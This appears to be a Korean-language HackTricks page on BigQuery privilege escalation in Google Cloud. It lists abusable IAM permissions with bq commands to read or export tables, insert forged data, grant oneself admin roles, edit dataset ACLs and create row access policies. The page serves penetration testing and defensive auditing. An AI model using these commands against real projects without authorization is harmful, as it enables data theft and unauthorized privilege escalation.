GCP - BigQuery Privesc

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

BigQuery

BigQuery에 대한 자세한 정보는 다음을 참조하세요:

pageGCP - Bigquery Enum

테이블 읽기

BigQuery 테이블에 저장된 정보를 읽으면 민감한 정보를 찾을 수 있습니다. 정보에 액세스하기 위해 필요한 권한은 bigquery.tables.get, bigquery.jobs.create 및 **bigquery.tables.getData**입니다:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

데이터 내보내기

이것은 데이터에 접근하는 또 다른 방법입니다. 데이터를 클라우드 스토리지 버킷으로 내보내고 정보가 담긴 파일을 다운로드합니다. 이 작업을 수행하기 위해서는 다음 권한이 필요합니다: bigquery.tables.export, bigquery.jobs.createstorage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

데이터 삽입

다른 장소의 취약점을 악용하기 위해 Bigquery 테이블에 특정 신뢰할 수 있는 데이터를 삽입하는 것이 가능할 수 있습니다. 이는 bigquery.tables.get, bigquery.tables.updateDatabigquery.jobs.create 권한을 사용하여 쉽게 수행할 수 있습니다:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

bigquery.datasets.setIamPolicy

공격자는 이 권한을 악용하여 BigQuery 데이터셋에 대해 자신에게 추가적인 권한을 부여할 수 있습니다:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

이 권한만으로도 BigQuery 데이터셋에 대한 액세스를 업데이트하여 액세스할 수 있는 사용자를 나타내는 ACL을 수정할 수 있습니다:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>

bigquery.tables.setIamPolicy

이 권한을 악용하는 공격자는 BigQuery 테이블에 대해 자신에게 추가 권한을 부여할 수 있습니다:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

문서에 따르면, 위에 언급된 권한을 사용하면 행 정책을 업데이트할 수 있습니다. 그러나, bq CLI를 사용하려면 추가로 필요한 권한이 있습니다: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("user:user@email.xyz") FILTER USING (term = "Cfba");' # A example filter was used

행 정책 열거의 출력에서 필터 ID를 찾을 수 있습니다. 예시:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

最終更新